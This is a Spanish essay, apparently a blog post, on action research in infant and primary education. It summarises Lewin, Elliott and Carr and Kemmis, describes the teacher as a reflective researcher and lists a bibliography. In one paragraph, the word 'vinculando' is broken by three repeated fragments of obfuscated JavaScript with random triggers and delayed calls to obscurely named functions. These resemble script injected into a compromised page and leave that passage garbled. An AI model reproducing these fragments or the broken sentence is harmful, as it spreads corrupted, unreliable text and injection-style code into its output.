IMPLICACIONES DE LA INVESTIGACIÓN- ACCIÓN EN EDUCACIÓN INFANTIL Y EN EDUCACIÓN PRIMARIA

Autora: Milagros García Habernau

          A lo largo de la historia de la investigación-acción se han sucedido diferentes concepciones sobre la misma. Entre los hitos más significativos en la historia de la investigación-acción, podemos destacar:

          -El trabajo de Kurt Lewin en 1946. Los autores sitúan los comienzos de la investigación-acción  en la obra de este psicólogo social. Este autor la definía como un “proceso cíclico de exploración, actuación y valoración de resultados”.  Recoge la idea de la investigación-acción  como una practica social que integra en ella la investigación, que debe ser llevada a cabo por los protagonistas de las acciones sociales y no  por los expertos o investigadores profesionales. Entre los principios clave de su obra destacamos: el carácter participativo y democrático; el compromiso con el cambio y la mejora, y su contribución a la ciencia social y al cambio.

          -Elliot plantea que la investigación-acción  ha de ser una actividad desarrollada en grupo o en comunidad, lo cual implica que sea colectiva, y una práctica social reflexiva.


          De acuerdo con Elliot las caracteríssticas de la investigación-acción son las siguientes:

  • Aborda problemas de los maestros, dirigidos a mejorar la institución. Son los maestros los q deciden el tema de investigación y los q planifican y ejecutan, según las necesidades sentidas como propias.
  • Implica la cooperación entre los profesores: es una tarea de equipo y éste es uno de los requisitos básicos q define la investigación-acción.
  • Conlleva la realización de tareas prácticas y no complicadas, q no requieren especialización específica, más allá de la propiamente docente.
  • Proporciona información para resolver problemas.

         -Carr y Kemmis en 1988, la describen como “la forma de indagación autorreflexiva emprendida por los participantes en situaciones educativas para mejorar sus propias prácticas educativas, su comprensión de las mismas y las situaciones educativas en el centro en que tales prácticas se llevan a cabo”.

           De estas definiciones se deduce q la investigación-acción recoge la aspiración de vincular la teoría con la práctica, la investigación con la aplicación. Este modelo es el mas adecuado para analizar y mejorar la práctica educativa en el aula, en un marco caracterizado por la flexibilidad del currículo y la autonomía pedagógica donde centros y profesores son los actores principales de su propia práctica.

            El profesor reflexiona sobre su práctica y busca soluciones a los problemas, vinculandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando su actividad educativa a la investigadora, haciendo posible la innovación educativa. Este último es el planteamiento que sigue la I/A, donde investigación y docencia se complementan la una a la otra.

             Una vez visto el concepto de la investigacion-acción, en segundo  lugar se va ha resumir en pequeñas líneas la evolución de la investigación- acción: A partir del nacimiento de la Pedagogía como ciencia, y la estructuración de las diferentes Ciencias de la Educación, se produjo, ya en la época moderna, un gran interés por fundamentar científicamente la práctica educativa, lo que dio lugar a un desarrollo muy pronunciado de la investigación educativa. Era una investigación llevada a cabo por expertos, eminentemente científica y desligada de la realidad que los maestros vivían en las aulas, por eso la publicación de sus investigaciones producía pocos frutos en la mejora  de la práctica educativa.

           A partir de los 90 se produce un gran cambio en el sistema educativo. Es necesario que existan educadores que investiguen cómo afecta ese cambio en la Educación. Los profesores deben comprometerse e investigar sobre su propia práctica.                  

           La investigación-acción  guarda una estrecha vinculación con la Educación Infantil y la Educación Primaria, pues, a lo largo de nuestro Sistema Educativo, el profesor adopta un papel participativo en el proceso de E/A; se le encarga  la concreción del currículo partiendo de las características de los alumnos y del centro.

           En definitiva, los maestros son quienes mejor conocen los problemas de la escuela. Por ello, encontramos en la investigación-acción una nueva metodología para la resolución de los mismos.

  •  Debe investigar para ofrecer al niño lo que necesita, proporcionándole aprendizajes significativos que conecten con sus experiencias
  • Debe investigar y reflexionar sobre cuestiones organizativas: de espacio, recursos, materiales, agrupamientos, y en el desarrollo de la programación: objetivos, contenidos, recursos y evaluación.
  • Debe orientar los procesos de desarrollo de los alumnos, crear situaciones de aprendizaje para que los alumnos se desenvuelvan con autonomía, seleccionar recursos y medios para que el aprendizaje sea significativo.
  •  Desarrollar estrategias y métodos para actuar en la práctica educativa de un modo más adecuado y eficaz.
  • Reflexionar sobre las propias actuaciones a fin de identificar problemas y proponer las acciones necesarias para el cambio.
  • Realizar un análisis de la realidad educativa en Infantil y primaria: situaciones, problemas, intereses, necesidades , con el fin de ofrecer nuevas soluciones.
  • Vincular la práctica con la investigación y la formación profesional.
  • Es decir, el profesor debe tener en cuenta la realidad referente al alumno, al centro, curriculum, a los recursos disponibles, técnicas y metodología más apropiada, seguido de una revisión continua de la propia intervención( actitud reflexiva e investigadora).

          Al profesor se le adjudica un papel activo en la renovación de la enseñanza; se trata de un profesional que asume la responsabilidad de investigar su propia práctica docente con la intención de mejorarla. Este es un proceso continuo, progresivo, basado en la reflexión, que requiere de un trabajo cooperativo por parte de los profesores de un centro, ya que ellos son los que deben implicarse en la mejora de su propia práctica educativa, puesto que son los que mejor conocen esa realidad.

          Pero no solo necesitará de la buena disposición de los maestros, sino que para que resulte posible los centros educativos y la administración en general debe articular medidas y condiciones laborales que permitan la investigación como por ejemplo, ayudas económicas, asesoramiento de expertos, licencias por estudios, previsión de tiempos y espacios que permitan a los equipos docentes reflexionar, cooperar, evaluar, investigar.

          No solo es necesario el tiempo sino el reconocimiento social, acerca del valor de estas investigaciones para el conocimiento y desarrollo profesional.


 

BIBLIOGRAFÍA: 

  • Blázquez F (1991): “La investigación-acción. Métodos y técnicas de investigación cualitativa”. En Sáenz O. Prácticas de enseñanza. Proyectos curriculares de investigación-acción. Alcon. Madrid.
  • Saenz, Óscar. Didáctica General. Editorial Anaya. Madrid, 1989.
  • Elliot, J (1994). La investigación-acción en educación. Madrid.Editorial Morata.
  •  Stenhouse (1987). La investigación como base de la enseñanza. Madrid. Morata.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.